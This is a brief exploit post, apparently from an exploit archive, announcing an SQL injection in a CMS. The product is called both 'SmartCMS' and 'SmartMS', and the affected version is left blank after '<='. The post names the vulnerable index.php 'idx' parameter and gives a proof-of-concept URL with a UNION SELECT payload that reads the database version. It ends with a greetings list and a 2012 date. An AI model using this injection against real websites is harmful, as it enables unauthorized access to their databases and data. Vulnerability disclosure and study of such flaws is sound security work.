33 lines
1.1 KiB
Text
Executable file
33 lines
1.1 KiB
Text
Executable file
=============================================================================================================
|
|
|
|
[o] SmartCMS <= SQL Injection Vulnerability
|
|
|
|
Software : SmartMS
|
|
Vendor : http://smartcms.nl/
|
|
Author : NoGe
|
|
Contact : noge[dot]code[at]gmail[dot]com
|
|
Blog : http://evilc0de.blogspot.com/
|
|
|
|
=============================================================================================================
|
|
|
|
[o] Exploit
|
|
|
|
http://localhost/[path]/index.php?idx=[SQLi]
|
|
|
|
|
|
[o] PoC
|
|
|
|
http://localhost/[path]/index.php?idx=123+AND+1=2+UNION+ALL+SELECT+version()--
|
|
|
|
=============================================================================================================
|
|
|
|
[o] Greetz
|
|
|
|
Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
|
|
aJe kaka11 matthews wishnusakti inc0mp13te martfella
|
|
pizzyroot Genex H312Y noname tukulesto }^-^{
|
|
|
|
=============================================================================================================
|
|
|
|
[o] November 26 2012 - Papua, Indonesia
|
|
|